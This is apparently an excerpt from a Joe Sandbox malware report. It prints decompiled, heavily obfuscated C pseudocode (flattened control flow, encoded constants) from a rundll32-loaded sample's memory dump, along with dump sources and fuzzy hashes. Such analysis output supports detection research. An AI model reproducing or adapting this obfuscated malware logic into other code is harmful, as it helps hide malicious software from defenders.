                                                                                                                      				_v636 = 0x96d5f2;
                                                                                                                      				_v636 = _v636 + 0xd4a1;
                                                                                                                      				_t230 = 0x30;
                                                                                                                      				_v636 = _v636 * 0x11;
                                                                                                                      				_v636 = _v636 ^ 0x0a12807c;
                                                                                                                      				_v660 = 0x62eec7;
                                                                                                                      				_v660 = _v660 >> 3;
                                                                                                                      				_v660 = _v660 / _t230;
                                                                                                                      				_v660 = _v660 ^ 0xcf464c50;
                                                                                                                      				_v660 = _v660 ^ 0xcf48190c;
                                                                                                                      				_v596 = 0xd58755;
                                                                                                                      				_v596 = _v596 + 0xffffee65;
                                                                                                                      				_v596 = _v596 ^ 0x00d4794f;
                                                                                                                      				_v652 = 0xd65add;
                                                                                                                      				_v652 = _v652 + 0x69d5;
                                                                                                                      				_v652 = _v652 + 0xffff6cdd;
                                                                                                                      				_t231 = 0x44;
                                                                                                                      				_v652 = _v652 * 0x6f;
                                                                                                                      				_v652 = _v652 ^ 0x5cddf580;
                                                                                                                      				_v592 = 0x774283;
                                                                                                                      				_v592 = _v592 / _t231;
                                                                                                                      				_v592 = _v592 ^ 0x00057017;
                                                                                                                      				_v608 = 0x66f034;
                                                                                                                      				_v608 = _v608 * 0x1b;
                                                                                                                      				_v608 = _v608 ^ 0x0ad54449;
                                                                                                                      				_v628 = 0x797189;
                                                                                                                      				_v628 = _v628 | 0xd7c49ce2;
                                                                                                                      				_v628 = _v628 + 0x4eb;
                                                                                                                      				_v628 = _v628 ^ 0xd7fc7544;
                                                                                                                      				_v644 = 0xc6323c;
                                                                                                                      				_t232 = 0x1a;
                                                                                                                      				_v644 = _v644 / _t232;
                                                                                                                      				_v644 = _v644 | 0xc7b29cf4;
                                                                                                                      				_v644 = _v644 ^ 0xc7b916af;
                                                                                                                      				_v640 = 0x832b72;
                                                                                                                      				_v640 = _v640 << 1;
                                                                                                                      				_v640 = _v640 ^ 0x03109e90;
                                                                                                                      				_v640 = _v640 ^ 0x021bea31;
                                                                                                                      				_v600 = 0x7e41eb;
                                                                                                                      				_v600 = _v600 ^ 0xc4682a67;
                                                                                                                      				_v600 = _v600 ^ 0xc419d008;
                                                                                                                      				_v648 = 0x2ae2e2;
                                                                                                                      				_v648 = _v648 ^ 0xaa2d9f28;
                                                                                                                      				_v648 = _v648 ^ 0xe0508244;
                                                                                                                      				_v648 = _v648 + 0xffff0ac8;
                                                                                                                      				_v648 = _v648 ^ 0x4a517815;
                                                                                                                      				_v656 = 0x46e590;
                                                                                                                      				_v656 = _v656 + 0xffffd71a;
                                                                                                                      				_v656 = _v656 << 0xb;
                                                                                                                      				_v656 = _v656 | 0x65ccd40d;
                                                                                                                      				_v656 = _v656 ^ 0x75e69a05;
                                                                                                                      				_v616 = 0x212081;
                                                                                                                      				_v616 = _v616 + 0xffff369d;
                                                                                                                      				_v616 = _v616 << 3;
                                                                                                                      				_v616 = _v616 ^ 0x010dc67b;
                                                                                                                      				_v612 = 0xde1992;
                                                                                                                      				_v612 = _v612 | 0x34451690;
                                                                                                                      				_v612 = _v612 ^ 0x34df36a3;
                                                                                                                      				_v664 = 0xb873dc;
                                                                                                                      				_t233 = 9;
                                                                                                                      				_t250 = _v612;
                                                                                                                      				_v664 = _v664 / _t233;
                                                                                                                      				_v664 = _v664 * 0x16;
                                                                                                                      				_v664 = _v664 << 6;
                                                                                                                      				_v664 = _v664 ^ 0x70bc85f2;
                                                                                                                      				_v672 = 0x9e756b;
                                                                                                                      				_v672 = _v672 + 0xfffff8a5;
                                                                                                                      				_v672 = _v672 << 4;
                                                                                                                      				_v672 = _v672 * 0x17;
                                                                                                                      				_v672 = _v672 ^ 0xe3b54af9;
                                                                                                                      				do {
                                                                                                                      					while(_t251 != 0x1d7b34c) {
                                                                                                                      						if(_t251 == 0x2564c7d) {
                                                                                                                      							_t217 = E0018BC49(_t250, _v628, _v644, _v640,  &_v564, _v600);
                                                                                                                      							_t234 = _v648;
                                                                                                                      							asm("sbb esi, esi");
                                                                                                                      							_t251 = ( ~_t217 & 0xf96b950b) + 0xe5304db;
                                                                                                                      							E00184DAD(_v648, _v656, _t250, _v616, _v612);
                                                                                                                      							_t258 = _t258 + 0x24;
                                                                                                                      							goto L14;
                                                                                                                      						} else {
                                                                                                                      							if(_t251 == 0x7be99e6) {
                                                                                                                      								_t248 = _v672;
                                                                                                                      								E0018BBB2(_v664, _t248,  &_v588);
                                                                                                                      								_pop(_t234);
                                                                                                                      								_t251 = 0xba7f047;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t251 == 0xb29cf6f) {
                                                                                                                      									_t234 = 0;
                                                                                                                      									_t248 = _v624;
                                                                                                                      									_t223 = E0018E938(0, _t248, _v660, _v596, _v632, 0, _v652, _v592, 0, _v608, _v620,  &_v524);
                                                                                                                      									_t250 = _t223;
                                                                                                                      									_t258 = _t258 + 0x28;
                                                                                                                      									__eflags = _t223 - 0xffffffff;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_t251 = 0x2564c7d;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t251 == 0xba7f047) {
                                                                                                                      										_t224 = E00179A1E();
                                                                                                                      										_t256 = _v588 - _v548;
                                                                                                                      										asm("sbb ecx, [esp+0x94]");
                                                                                                                      										__eflags = _v584 - _t248;
                                                                                                                      										if(__eflags >= 0) {
                                                                                                                      											if(__eflags > 0) {
                                                                                                                      												L19:
                                                                                                                      												_t227 = 1;
                                                                                                                      												__eflags = 1;
                                                                                                                      											} else {
                                                                                                                      												__eflags = _t256 - _t224;
                                                                                                                      												if(_t256 >= _t224) {
                                                                                                                      													goto L19;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										_t265 = _t251 - 0xcb5264b;
                                                                                                                      										if(_t251 != 0xcb5264b) {
                                                                                                                      											goto L14;
                                                                                                                      										} else {
                                                                                                                      											_t248 = _v668;
                                                                                                                      											_t226 = E001912A8(_t234, _t248, _t265, _v604, _v636,  &_v524);
                                                                                                                      											_t258 = _t258 + 0xc;
                                                                                                                      											if(_t226 != 0) {
                                                                                                                      												_t251 = 0xb29cf6f;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L20:
                                                                                                                      						return _t227;
                                                                                                                      					}
                                                                                                                      					_t251 = 0xcb5264b;
                                                                                                                      					L14:
                                                                                                                      					__eflags = _t251 - 0xe5304db;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L20;
                                                                                                                      			}













































                                                                                                                      0x0018c046
                                                                                                                      0x0018c04c
                                                                                                                      0x0018c059
                                                                                                                      0x0018c061
                                                                                                                      0x0018c069
                                                                                                                      0x0018c06d
                                                                                                                      0x0018c075
                                                                                                                      0x0018c07d
                                                                                                                      0x0018c085
                                                                                                                      0x0018c08d
                                                                                                                      0x0018c095
                                                                                                                      0x0018c09d
                                                                                                                      0x0018c0a5
                                                                                                                      0x0018c0ad
                                                                                                                      0x0018c0b5
                                                                                                                      0x0018c0bd
                                                                                                                      0x0018c0c5
                                                                                                                      0x0018c0cd
                                                                                                                      0x0018c0d2
                                                                                                                      0x0018c0da
                                                                                                                      0x0018c0e2
                                                                                                                      0x0018c0ea
                                                                                                                      0x0018c0f2
                                                                                                                      0x0018c0f7
                                                                                                                      0x0018c0ff
                                                                                                                      0x0018c107
                                                                                                                      0x0018c10f
                                                                                                                      0x0018c117
                                                                                                                      0x0018c123
                                                                                                                      0x0018c126
                                                                                                                      0x0018c12a
                                                                                                                      0x0018c133
                                                                                                                      0x0018c137
                                                                                                                      0x0018c13c
                                                                                                                      0x0018c144
                                                                                                                      0x0018c14c
                                                                                                                      0x0018c154
                                                                                                                      0x0018c15e
                                                                                                                      0x0018c162
                                                                                                                      0x0018c16a
                                                                                                                      0x0018c16a
                                                                                                                      0x0018c178
                                                                                                                      0x0018c254
                                                                                                                      0x0018c269
                                                                                                                      0x0018c26d
                                                                                                                      0x0018c276
                                                                                                                      0x0018c27c
                                                                                                                      0x0018c281
                                                                                                                      0x00000000
                                                                                                                      0x0018c17e
                                                                                                                      0x0018c184
                                                                                                                      0x0018c21e
                                                                                                                      0x0018c22b
                                                                                                                      0x0018c230
                                                                                                                      0x0018c231
                                                                                                                      0x00000000
                                                                                                                      0x0018c18a
                                                                                                                      0x0018c190
                                                                                                                      0x0018c1f3
                                                                                                                      0x0018c200
                                                                                                                      0x0018c204
                                                                                                                      0x0018c209
                                                                                                                      0x0018c20b
                                                                                                                      0x0018c20e
                                                                                                                      0x0018c211
                                                                                                                      0x0018c217
                                                                                                                      0x00000000
                                                                                                                      0x0018c217
                                                                                                                      0x0018c192
                                                                                                                      0x0018c198
                                                                                                                      0x0018c299
                                                                                                                      0x0018c2a2
                                                                                                                      0x0018c2ad
                                                                                                                      0x0018c2b4
                                                                                                                      0x0018c2b6
                                                                                                                      0x0018c2b8
                                                                                                                      0x0018c2be
                                                                                                                      0x0018c2c0
                                                                                                                      0x0018c2c0
                                                                                                                      0x0018c2ba
                                                                                                                      0x0018c2ba
                                                                                                                      0x0018c2bc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018c2bc
                                                                                                                      0x0018c2b8
                                                                                                                      0x0018c19e
                                                                                                                      0x0018c19e
                                                                                                                      0x0018c1a4
                                                                                                                      0x00000000
                                                                                                                      0x0018c1aa
                                                                                                                      0x0018c1ba
                                                                                                                      0x0018c1be
                                                                                                                      0x0018c1c3
                                                                                                                      0x0018c1c8
                                                                                                                      0x0018c1ce
                                                                                                                      0x00000000
                                                                                                                      0x0018c1ce
                                                                                                                      0x0018c1c8
                                                                                                                      0x0018c1a4
                                                                                                                      0x0018c198
                                                                                                                      0x0018c190
                                                                                                                      0x0018c184
                                                                                                                      0x0018c2c4
                                                                                                                      0x0018c2cd
                                                                                                                      0x0018c2cd
                                                                                                                      0x0018c286
                                                                                                                      0x0018c28b
                                                                                                                      0x0018c28b
                                                                                                                      0x0018c28b
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: A~$*
                                                                                                                      • API String ID: 0-472959745
                                                                                                                      • Opcode ID: 26ffb21ea4de1e855063fb1c6cd638f33f61a66a964de79051ee85dfae76ed2a
                                                                                                                      • Instruction ID: f101fabcd838d426c3718cda6a5ad96da99c3248bf7867b0ed0370722d375183
                                                                                                                      • Opcode Fuzzy Hash: 26ffb21ea4de1e855063fb1c6cd638f33f61a66a964de79051ee85dfae76ed2a
                                                                                                                      • Instruction Fuzzy Hash: CCB142728083809FD758EFA5C58941BFBE2BBC4758F518A1DF5A596260D3B18A09CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E001841A7() {
                                                                                                                      				signed int _v4;
                                                                                                                      				char _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				void* _t218;
                                                                                                                      				signed int _t219;
                                                                                                                      				signed int _t227;
                                                                                                                      				intOrPtr _t228;
                                                                                                                      				signed int _t229;
                                                                                                                      				signed int _t230;
                                                                                                                      				signed int _t231;
                                                                                                                      				signed int _t232;
                                                                                                                      				void* _t233;
                                                                                                                      				void* _t251;
                                                                                                                      				signed int* _t255;
                                                                                                                      
                                                                                                                      				_t255 =  &_v100;
                                                                                                                      				_v68 = 0xec424;
                                                                                                                      				_v68 = _v68 | 0x15a76721;
                                                                                                                      				_v68 = _v68 + 0xba51;
                                                                                                                      				_v68 = _v68 ^ 0x95b0a177;
                                                                                                                      				_v32 = 0x9cb342;
                                                                                                                      				_v32 = _v32 >> 0xf;
                                                                                                                      				_v32 = _v32 ^ 0x0000013b;
                                                                                                                      				_v72 = 0xae6f3e;
                                                                                                                      				_v72 = _v72 >> 0xb;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v72 = _v72 * 0x1b;
                                                                                                                      				_t251 = 0x38ba83c;
                                                                                                                      				_v72 = _v72 ^ 0x000cf0a1;
                                                                                                                      				_v40 = 0xd29c0d;
                                                                                                                      				_v40 = _v40 | 0x0be9fd1c;
                                                                                                                      				_v40 = _v40 ^ 0x0bf96d7b;
                                                                                                                      				_v96 = 0x10a61a;
                                                                                                                      				_v96 = _v96 + 0x673b;
                                                                                                                      				_v96 = _v96 + 0x336d;
                                                                                                                      				_v96 = _v96 + 0x2fcb;
                                                                                                                      				_v96 = _v96 ^ 0x001323ac;
                                                                                                                      				_v100 = 0x9d3afd;
                                                                                                                      				_v100 = _v100 << 7;
                                                                                                                      				_v100 = _v100 << 5;
                                                                                                                      				_t230 = 0x55;
                                                                                                                      				_v100 = _v100 / _t230;
                                                                                                                      				_v100 = _v100 ^ 0x027b67ec;
                                                                                                                      				_v84 = 0x9cb324;
                                                                                                                      				_v84 = _v84 + 0xffffbca6;
                                                                                                                      				_v84 = _v84 + 0xd0f1;
                                                                                                                      				_v84 = _v84 << 0xa;
                                                                                                                      				_v84 = _v84 ^ 0x750d3d14;
                                                                                                                      				_v88 = 0x3cd70;
                                                                                                                      				_v88 = _v88 << 0xc;
                                                                                                                      				_v88 = _v88 + 0x865d;
                                                                                                                      				_t231 = 0x65;
                                                                                                                      				_v88 = _v88 / _t231;
                                                                                                                      				_v88 = _v88 ^ 0x009e1e24;
                                                                                                                      				_v24 = 0xf6c479;
                                                                                                                      				_v24 = _v24 ^ 0xf85d6d57;
                                                                                                                      				_v24 = _v24 ^ 0xf8a5b53e;
                                                                                                                      				_v92 = 0xa4533c;
                                                                                                                      				_v92 = _v92 << 8;
                                                                                                                      				_v92 = _v92 << 0xf;
                                                                                                                      				_v92 = _v92 ^ 0x907f3c14;
                                                                                                                      				_v92 = _v92 ^ 0x0e792839;
                                                                                                                      				_v28 = 0xd04f15;
                                                                                                                      				_v28 = _v28 * 0x53;
                                                                                                                      				_v28 = _v28 ^ 0x4380c19a;
                                                                                                                      				_v36 = 0x6fba0d;
                                                                                                                      				_v36 = _v36 * 0x6b;
                                                                                                                      				_v36 = _v36 ^ 0x2ebab037;
                                                                                                                      				_v20 = 0x23d496;
                                                                                                                      				_v20 = _v20 ^ 0x4cebd1bd;
                                                                                                                      				_v20 = _v20 ^ 0x4cc2ad40;
                                                                                                                      				_v60 = 0x3b5a6d;
                                                                                                                      				_v60 = _v60 >> 0x10;
                                                                                                                      				_v60 = _v60 << 7;
                                                                                                                      				_v60 = _v60 ^ 0x0000f98a;
                                                                                                                      				_v64 = 0xf0d036;
                                                                                                                      				_v64 = _v64 + 0xffff53b4;
                                                                                                                      				_v64 = _v64 ^ 0x894664b9;
                                                                                                                      				_v64 = _v64 ^ 0x89bf3867;
                                                                                                                      				_v48 = 0xb08deb;
                                                                                                                      				_v48 = _v48 | 0x78ca9a10;
                                                                                                                      				_v48 = _v48 + 0xffff33de;
                                                                                                                      				_v48 = _v48 ^ 0x78fbc05b;
                                                                                                                      				_v16 = 0x2da7c5;
                                                                                                                      				_v16 = _v16 >> 6;
                                                                                                                      				_v16 = _v16 ^ 0x00092ddb;
                                                                                                                      				_v52 = 0x523898;
                                                                                                                      				_t232 = 0x59;
                                                                                                                      				_t227 = _v4;
                                                                                                                      				_v52 = _v52 / _t232;
                                                                                                                      				_v52 = _v52 << 9;
                                                                                                                      				_v52 = _v52 ^ 0x01d201e4;
                                                                                                                      				_v56 = 0x19cc06;
                                                                                                                      				_v56 = _v56 + 0xfffff128;
                                                                                                                      				_v56 = _v56 << 0xe;
                                                                                                                      				_v56 = _v56 ^ 0x6f4387c2;
                                                                                                                      				_v76 = 0x5278ca;
                                                                                                                      				_v76 = _v76 << 9;
                                                                                                                      				_v76 = _v76 ^ 0x8826d706;
                                                                                                                      				_t233 = 0x5c;
                                                                                                                      				_v76 = _v76 * 0x5a;
                                                                                                                      				_v76 = _v76 ^ 0xc3a97567;
                                                                                                                      				_v12 = 0xdfbc19;
                                                                                                                      				_v12 = _v12 + 0xffff7584;
                                                                                                                      				_v12 = _v12 ^ 0x00deabf9;
                                                                                                                      				_v44 = 0x7b85bc;
                                                                                                                      				_v44 = _v44 * 9;
                                                                                                                      				_v44 = _v44 ^ 0xa28277a7;
                                                                                                                      				_v44 = _v44 ^ 0xa6d14151;
                                                                                                                      				_v80 = 0xd07577;
                                                                                                                      				_v80 = _v80 | 0x5043dc19;
                                                                                                                      				_v80 = _v80 * 0x49;
                                                                                                                      				_v80 = _v80 * 0x43;
                                                                                                                      				_v80 = _v80 ^ 0x4228a280;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t218 = 0x35852e4;
                                                                                                                      					do {
                                                                                                                      						while(_t251 != _t218) {
                                                                                                                      							if(_t251 == 0x38ba83c) {
                                                                                                                      								_t251 = 0xe9ff08f;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t251 == 0x83f204b) {
                                                                                                                      									E00177AF8(_v76, _v12, _v8, _v44, _v80);
                                                                                                                      								} else {
                                                                                                                      									if(_t251 == 0xe0715ba) {
                                                                                                                      										_push(_v100);
                                                                                                                      										_push(_v96);
                                                                                                                      										_t238 = _v72;
                                                                                                                      										_push(0x17118c);
                                                                                                                      										__eflags = E00178786(_v84, _v40, _v72,  &_v8, _v88, E0017AB66(_v72, _v40, __eflags), _v24, _v92, _v72, _t238, _v28, _v32, _v68, _t238, _v36);
                                                                                                                      										_t251 =  ==  ? 0x35852e4 : 0xdf478d7;
                                                                                                                      										E0017AE03(_v20, _v60, _v64, _t222);
                                                                                                                      										_t255 =  &(_t255[0x12]);
                                                                                                                      										L14:
                                                                                                                      										_t218 = 0x35852e4;
                                                                                                                      										_t233 = 0x5c;
                                                                                                                      										goto L15;
                                                                                                                      									} else {
                                                                                                                      										if(_t251 != 0xe9ff08f) {
                                                                                                                      											goto L15;
                                                                                                                      										} else {
                                                                                                                      											_t228 =  *0x19520c; // 0x0
                                                                                                                      											_t229 = _t228 + 0x220;
                                                                                                                      											while( *_t229 != _t233) {
                                                                                                                      												_t229 = _t229 + 2;
                                                                                                                      												__eflags = _t229;
                                                                                                                      											}
                                                                                                                      											_t227 = _t229 + 2;
                                                                                                                      											_t251 = 0xe0715ba;
                                                                                                                      											goto L1;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L18:
                                                                                                                      							return _v4;
                                                                                                                      						}
                                                                                                                      						_t219 = E0017EFA6(_v48, _v16, _t227, _v52, _v8, _v56);
                                                                                                                      						_t255 =  &(_t255[4]);
                                                                                                                      						__eflags = _t219;
                                                                                                                      						_t251 = 0x83f204b;
                                                                                                                      						_t196 = _t219 == 0;
                                                                                                                      						__eflags = _t196;
                                                                                                                      						_v4 = 0 | _t196;
                                                                                                                      						goto L14;
                                                                                                                      						L15:
                                                                                                                      						__eflags = _t251 - 0xdf478d7;
                                                                                                                      					} while (__eflags != 0);
                                                                                                                      					goto L18;
                                                                                                                      				}
                                                                                                                      			}







































                                                                                                                      0x0018457e
                                                                                                                      0x00184581
                                                                                                                      0x00184583
                                                                                                                      0x00184588
                                                                                                                      0x00184588
                                                                                                                      0x0018458b
                                                                                                                      0x00000000
                                                                                                                      0x00184597
                                                                                                                      0x00184597
                                                                                                                      0x00184597
                                                                                                                      0x00000000
                                                                                                                      0x001845a3

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: m3$mZ;
                                                                                                                      • API String ID: 0-2099856273
                                                                                                                      • Opcode ID: 7c4ba60056714568650a74965943749207a681d58a9f496574325dace34f4a12
                                                                                                                      • Instruction ID: 869803f060482af5eba4d0b4814a95b96a93ff35a15ee4fa87aaeddf8a69e9d6
                                                                                                                      • Opcode Fuzzy Hash: 7c4ba60056714568650a74965943749207a681d58a9f496574325dace34f4a12
                                                                                                                      • Instruction Fuzzy Hash: 62A120B25093819BC358CF25D98A41FBBF1BBD8748F104A1DF29A96260D7B1CA09CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0018FF31(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				char _v48;
                                                                                                                      				intOrPtr _v52;
                                                                                                                      				intOrPtr _v56;
                                                                                                                      				intOrPtr _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				unsigned int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				unsigned int _v112;
                                                                                                                      				unsigned int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				void* _t147;
                                                                                                                      				intOrPtr _t161;
                                                                                                                      				signed int _t169;
                                                                                                                      				void* _t172;
                                                                                                                      				void* _t188;
                                                                                                                      				intOrPtr* _t189;
                                                                                                                      				void* _t191;
                                                                                                                      				void* _t192;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t188 = __edx;
                                                                                                                      				_t189 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t147);
                                                                                                                      				_v60 = 0xe50c8f;
                                                                                                                      				_v56 = 0;
                                                                                                                      				_t192 = _t191 + 0x14;
                                                                                                                      				_v52 = 0;
                                                                                                                      				_v76 = 0x2f3c66;
                                                                                                                      				_t172 = 0x80c5f05;
                                                                                                                      				_v76 = _v76 >> 1;
                                                                                                                      				_v76 = _v76 ^ 0x00179e33;
                                                                                                                      				_v100 = 0xdfcc0f;
                                                                                                                      				_v100 = _v100 + 0x5dbe;
                                                                                                                      				_v100 = _v100 >> 0xc;
                                                                                                                      				_v100 = _v100 ^ 0x00087c2f;
                                                                                                                      				_v112 = 0xadc62;
                                                                                                                      				_v112 = _v112 | 0x1372df76;
                                                                                                                      				_v112 = _v112 >> 7;
                                                                                                                      				_v112 = _v112 ^ 0x002d2981;
                                                                                                                      				_v116 = 0xfe909d;
                                                                                                                      				_v116 = _v116 << 7;
                                                                                                                      				_t169 = 0x44;
                                                                                                                      				_v116 = _v116 / _t169;
                                                                                                                      				_v116 = _v116 >> 0xc;
                                                                                                                      				_v116 = _v116 ^ 0x0009e39a;
                                                                                                                      				_v120 = 0xded18e;
                                                                                                                      				_v120 = _v120 + 0xffff5063;
                                                                                                                      				_v120 = _v120 ^ 0xd3175283;
                                                                                                                      				_v120 = _v120 * 0x6d;
                                                                                                                      				_v120 = _v120 ^ 0x2cc94156;
                                                                                                                      				_v124 = 0xc7fb01;
                                                                                                                      				_v124 = _v124 + 0xffff9b92;
                                                                                                                      				_v124 = _v124 | 0x8f919799;
                                                                                                                      				_v124 = _v124 + 0xaff8;
                                                                                                                      				_v124 = _v124 ^ 0x8fd45f25;
                                                                                                                      				_v68 = 0xadf2f0;
                                                                                                                      				_v68 = _v68 << 3;
                                                                                                                      				_v68 = _v68 ^ 0x056cc5e6;
                                                                                                                      				_v72 = 0x9db552;
                                                                                                                      				_v72 = _v72 << 6;
                                                                                                                      				_v72 = _v72 ^ 0x276b9b1e;
                                                                                                                      				_v64 = 0x9edb03;
                                                                                                                      				_v64 = _v64 ^ 0x7ad40136;
                                                                                                                      				_v64 = _v64 ^ 0x7a416b45;
                                                                                                                      				_v96 = 0x899086;
                                                                                                                      				_v96 = _v96 + 0x3abe;
                                                                                                                      				_v96 = _v96 + 0xffff9b83;
                                                                                                                      				_v96 = _v96 ^ 0x008dc818;
                                                                                                                      				_v80 = 0x1613a8;
                                                                                                                      				_v80 = _v80 >> 8;
                                                                                                                      				_v80 = _v80 ^ 0x000fe8a1;
                                                                                                                      				_v84 = 0xc2e1e1;
                                                                                                                      				_v84 = _v84 << 4;
                                                                                                                      				_v84 = _v84 ^ 0x0c264902;
                                                                                                                      				_v104 = 0x78369d;
                                                                                                                      				_v104 = _v104 ^ 0x8f03ebf2;
                                                                                                                      				_v104 = _v104 * 0x5b;
                                                                                                                      				_v104 = _v104 ^ 0x010dd9c3;
                                                                                                                      				_v88 = 0x6e061c;
                                                                                                                      				_v88 = _v88 * 0x7f;
                                                                                                                      				_v88 = _v88 >> 6;
                                                                                                                      				_v88 = _v88 ^ 0x00d4f969;
                                                                                                                      				_v92 = 0x56c027;
                                                                                                                      				_v92 = _v92 ^ 0x48eed99d;
                                                                                                                      				_v92 = _v92 + 0xffff6999;
                                                                                                                      				_v92 = _v92 ^ 0x48bab2c5;
                                                                                                                      				_v108 = 0xffa91b;
                                                                                                                      				_v108 = _v108 * 0x23;
                                                                                                                      				_v108 = _v108 | 0x4c85b786;
                                                                                                                      				_v108 = _v108 * 0x3a;
                                                                                                                      				_v108 = _v108 ^ 0x23a92266;
                                                                                                                      				do {
                                                                                                                      					while(_t172 != 0xd9dda6) {
                                                                                                                      						if(_t172 == 0x1ff9304) {
                                                                                                                      							E00184D91( *((intOrPtr*)(_t188 + 0x14)),  &_v48, _v64, _v96);
                                                                                                                      							_t192 = _t192 + 8;
                                                                                                                      							_t172 = 0xcf0dfe0;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t172 == 0x2f8759c) {
                                                                                                                      								_push(_t172);
                                                                                                                      								_push(_t172);
                                                                                                                      								_t161 = E00183512( *(_t189 + 4));
                                                                                                                      								 *_t189 = _t161;
                                                                                                                      								__eflags = _t161;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_t172 = 0x3d5ab39;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t172 == 0x3d5ab39) {
                                                                                                                      									E001864C5(_v120, _v124, _v68, _v72, _t189,  &_v48);
                                                                                                                      									_t192 = _t192 + 0x10;
                                                                                                                      									_t172 = 0x1ff9304;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t172 == 0x80c5f05) {
                                                                                                                      										_t172 = 0xd9dda6;
                                                                                                                      										 *_t189 = 0;
                                                                                                                      										 *(_t189 + 4) = _v76;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t172 == 0xcf0dfe0) {
                                                                                                                      											E0018F88F(_t188 + 0xc,  &_v48, __eflags, _v80, _v84, _v104);
                                                                                                                      											_t192 = _t192 + 0xc;
                                                                                                                      											_t172 = 0xfec6e86;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											_t201 = _t172 - 0xfec6e86;
                                                                                                                      											if(_t172 != 0xfec6e86) {
                                                                                                                      												goto L17;
                                                                                                                      											} else {
                                                                                                                      												E0018F88F(_t188 + 4,  &_v48, _t201, _v88, _v92, _v108);
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L9:
                                                                                                                      						return 0 |  *_t189 != 0x00000000;
                                                                                                                      					}
                                                                                                                      					 *(_t189 + 4) = E0018542E(_t188);
                                                                                                                      					_t172 = 0x2f8759c;
                                                                                                                      					L17:
                                                                                                                      					__eflags = _t172 - 0x1551776;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L9;
                                                                                                                      			}


                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
